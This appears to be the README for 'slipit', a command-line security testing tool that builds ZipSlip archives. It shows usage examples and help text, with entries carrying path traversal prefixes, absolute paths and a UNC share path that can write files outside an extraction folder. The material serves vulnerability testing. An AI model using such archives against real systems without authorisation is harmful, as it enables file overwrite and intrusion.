slipit is a command line utility for creating archives with path traversal elements. It is basically a successor of the famous evilarc utility with an extended feature set and improved base functionality.
[user@host ~]$ slipit archive.tar.gz
?rw-r--r-- user/user 24 2022-08-25 10:57:35 legit.txt
[user@host ~]$ slipit archive.tar.gz file1.txt file2.txt
[user@host ~]$ slipit archive.tar.gz
?rw-r--r-- user/user 24 2022-08-25 10:57:35 legit.txt
?rw-r--r-- user/user 3 2022-08-25 10:56:41 ..\..\..\..\..\..\file1.txt
?rw-r--r-- user/user 3 2022-08-25 10:56:44 ..\..\..\..\..\..\file2.txt
[user@host ~]$ slipit archive.tar.gz file1.txt --depth 3 --increment 1
[user@host ~]$ slipit archive.tar.gz
?rw-r--r-- user/user 24 2022-08-25 10:57:35 legit.txt
?rw-r--r-- user/user 3 2022-08-25 10:56:41 ..\..\..\..\..\..\file1.txt
?rw-r--r-- user/user 3 2022-08-25 10:56:44 ..\..\..\..\..\..\file2.txt
?rw-r--r-- user/user 3 2022-08-25 10:56:41 ..\file1.txt
?rw-r--r-- user/user 3 2022-08-25 10:56:41 ..\..\file1.txt
?rw-r--r-- user/user 3 2022-08-25 10:56:41 ..\..\..\file1.txt
[user@host ~]$ slipit archive.tar.gz --clear
[user@host ~]$ slipit archive.tar.gz
?rw-r--r-- user/user 24 2022-08-25 10:57:35 legit.txt
slipit can be installed via pip:
[user@host ~]$ pip3 install --user slipit
You can also build slipit from source by running the following commands:
[user@host ~]$ git clone https://github.com/usdAG/slipit
[user@host ~]$ cd slipit
[user@host slipit]$ python3 setup.py sdist
[user@host slipit]$ pip3 install --user dist/*
slipit also supports autocompletion for bash. To take advantage of autocompletion, you need to have the
completion-helpers project installed. If setup correctly, just
copying the completion script to your ~/.bash_completion.d
folder enables
autocompletion.
[user@host ~]$ slipit -h
usage: slipit [-h] [--archive-type {zip,tar,tgz,bz2}] [--clear] [--debug] [--depth int] [--increment int]
[--overwrite] [--prefix string] [--multi] [--remove name] [--separator char] [--sequence seq]
[--static content] [--symlink target] archive [filename ...]
slipit v1.0.1 - Utility for creating ZipSlip archives.
positional arguments:
archive target archive file
filename filenames to include into the archive
options:
-h, --help show this help message and exit
--archive-type {zip,tar,tgz,bz2}
archive type to use
--clear clear the specified archive from traversal items
--debug enable verbose error output
--depth int number of traversal sequences to use (default=6)
--increment int add incremental traversal payloads from <int> to depth
--overwrite overwrite the target archive instead of appending to it
--prefix string prefix to use before the file name
--multi create an archive containing multiple payloads
--remove name remove files from the archive (glob matching)
--separator char path separator (default=\)
--sequence seq use a custom traversal sequence (default=..{sep})
--static content use static content for each input file
--symlink target add as symlink (only available for tar archives)
slipit expects the targeted output archive and an arbitrary number of input files as mandatory command line
parameters. All specified input files are appended to the specified archive including a path traversal prefix
with a depth specified with the --depth
option (default is 6). The targeted archive format is determined
automatically depending on the file extension for non existing archives or by the mime type for already existing
archives. You can also specify the archive type manually by using the --archive-type
option.
[user@host ~]$ slipit example.zip
File Name Modified Size
example/ 2022-02-02 18:39:00 0
example/images/ 2022-02-02 18:40:16 0
example/images/holiday.png 2022-02-02 18:40:06 34001
example/images/beach.png 2022-02-02 18:40:16 2112
example/documents/ 2022-02-02 18:39:48 0
example/documents/invoice.docx 2022-02-02 18:39:40 3001
example/documents/important.docx 2022-02-02 18:39:48 121
[user@host ~]$ slipit example.zip test.txt
[user@host ~]$ slipit example.zip
File Name Modified Size
example/ 2022-02-02 18:39:00 0
example/images/ 2022-02-02 18:40:16 0
example/images/holiday.png 2022-02-02 18:40:06 34001
example/images/beach.png 2022-02-02 18:40:16 2112
example/documents/ 2022-02-02 18:39:48 0
example/documents/invoice.docx 2022-02-02 18:39:40 3001
example/documents/important.docx 2022-02-02 18:39:48 121
..\..\..\..\..\..\test.txt 2022-02-02 18:40:48 36
slipit expects the specified input files to exist on your local file system and uses the file content of
them within the archive. Often times this is not necessary and you just require dummy content to test for
ZipSlip vulnerabilities. This is where the --static <string>
option can be helpful. When using this option,
only the filenames of the specified input files are used within the archive, while their content is set to <string>
.
[user@host ~]$ slipit example.zip test2.txt --static 'HELLO WORLD :D'
[user@host ~]$ slipit example.zip
File Name Modified Size
example/ 2022-02-02 18:39:00 0
example/images/ 2022-02-02 18:40:16 0
example/images/holiday.png 2022-02-02 18:40:06 34001
example/images/beach.png 2022-02-02 18:40:16 2112
example/documents/ 2022-02-02 18:39:48 0
example/documents/invoice.docx 2022-02-02 18:39:40 3001
example/documents/important.docx 2022-02-02 18:39:48 121
..\..\..\..\..\..\test.txt 2022-02-02 18:40:48 36
..\..\..\..\..\..\test2.txt 2022-02-02 18:45:22 14
By using the --clear
option, you can clear an archive from path traversal payloads.
[user@host ~]$ slipit --clear example.zip
[user@host ~]$ slipit example.zip
File Name Modified Size
example/ 2022-02-02 18:39:00 0
example/images/ 2022-02-02 18:40:16 0
example/images/holiday.png 2022-02-02 18:40:06 34001
example/images/beach.png 2022-02-02 18:40:16 2112
example/documents/ 2022-02-02 18:39:48 0
example/documents/invoice.docx 2022-02-02 18:39:40 3001
example/documents/important.docx 2022-02-02 18:39:48 121
slipit also allows to create an archive containing multiple payloads by using the --multi
option:
[user@host ~]$ slipit example.zip test.txt --static content --multi
[user@host ~]$ slipit example.zip
File Name Modified Size
C:\Windows\test.txt 2022-02-03 09:35:28 7
\\10.10.10.1\share\test.txt 2022-02-03 09:35:28 7
/root/test.txt 2022-02-03 09:35:28 7
../test.txt 2022-02-03 09:35:28 7
..\test.txt 2022-02-03 09:35:28 7
../../test.txt 2022-02-03 09:35:28 7
..\..\test.txt 2022-02-03 09:35:28 7
../../../test.txt 2022-02-03 09:35:28 7
..\..\..\test.txt 2022-02-03 09:35:28 7
../../../../test.txt 2022-02-03 09:35:28 7
..\..\..\..\test.txt 2022-02-03 09:35:28 7
../../../../../test.txt 2022-02-03 09:35:28 7
..\..\..\..\..\test.txt 2022-02-03 09:35:28 7
Currently, the following archive types are supported (just naming their most common extension):
.zip
.tar
.tar.gz
.tar.bz2